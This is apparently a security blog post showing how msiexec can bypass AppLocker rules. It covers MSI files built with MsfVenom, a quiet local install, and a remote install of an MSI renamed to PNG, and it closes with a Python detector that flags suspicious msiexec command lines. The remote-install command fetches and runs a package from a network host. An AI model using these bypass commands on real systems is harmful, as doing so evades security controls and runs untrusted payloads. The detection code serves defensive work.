MSIEXEC is a Microsoft utility that can be used to install or configure a product from the command line. If an environment is not configured properly, the use of .MSI files can allow an attacker either to escalate privileges or to bypass AppLocker rules. This post demonstrates that systems which are not configured to block execution of MSI files for all users are not properly protected, as any AppLocker executable rule can be bypassed easily.

Metasploit's MsfVenom can be used to generate .MSI files that execute a command or a payload.

Executing powershell.msi opens a PowerShell session, bypassing the AppLocker rule that denies the use of PowerShell for all users.

MSIEXEC – PowerShell

It is also possible to run the command below either from a command prompt or, if that is blocked, through Windows Run.

msiexec /quiet /i cmd.msi

MSIEXEC via Run

The command prompt will open.

MSIEXEC – Command Prompt

Alternatively, the msiexec utility can run MSI files that have been renamed to PNG. These files can be executed either locally or remotely, from a command prompt or from Windows Run, bypassing AppLocker rules.

msiexec /q /i http://192.168.100.3/tmp/cmd.png

MSIEXEC – Command Prompt via PNG

The same concept also applies to MSI files that contain Meterpreter payloads.
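
From the defender's side, both msiexec invocations shown above leave distinctive process-creation command lines. The following is an added example, not part of the original post: a small triage function that flags msiexec installs whose package is remote or does not end in .msi. The function name, the sample log lines and the finding strings are constructed for illustration.

```python
import re
import shlex

# Constructed process-creation command lines (the kind recorded by Sysmon
# Event ID 1 or Security 4688). The first two are the commands from the post.
SAMPLE_CMDLINES = [
    r"msiexec /quiet /i cmd.msi",
    r"msiexec /q /i http://192.168.100.3/tmp/cmd.png",
    r'"C:\Windows\System32\msiexec.exe" /i "C:\Installers\vendor-agent.msi"',
    r"notepad.exe C:\Users\alice\notes.txt",
]

# Dash-prefixed forms are matched defensively alongside the slash forms.
INSTALL_SWITCHES = {"/i", "-i", "/package", "-package"}
QUIET_SWITCH = re.compile(r"^[/-](q|qn|quiet)$", re.IGNORECASE)
REMOTE_SOURCE = re.compile(r"^(https?://|\\\\)", re.IGNORECASE)  # URL or UNC path


def triage_msiexec(cmdline):
    """Return the reasons an msiexec install deserves review (empty list = none)."""
    try:
        tokens = shlex.split(cmdline, posix=False)  # keeps Windows backslashes
    except ValueError:                              # unbalanced quotes
        tokens = cmdline.split()
    tokens = [t.strip('"') for t in tokens]
    if not tokens:
        return []
    image = tokens[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image not in ("msiexec", "msiexec.exe"):
        return []
    args = tokens[1:]
    package = None
    for switch, value in zip(args, args[1:]):       # argument following /i
        if switch.lower() in INSTALL_SWITCHES:
            package = value
    if package is None:
        return []
    reasons = []
    if REMOTE_SOURCE.match(package):
        reasons.append("package fetched from a remote location")
    if not package.lower().split("?")[0].endswith(".msi"):
        reasons.append("package extension is not .msi")
    if any(QUIET_SWITCH.match(a) for a in args):
        reasons.append("quiet install (weak signal on its own)")
    return reasons


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(line, "->", triage_msiexec(line) or "no findings")
```

A quiet install is routine in software deployment, so that finding is only useful when combined with the user context and parent process of the event.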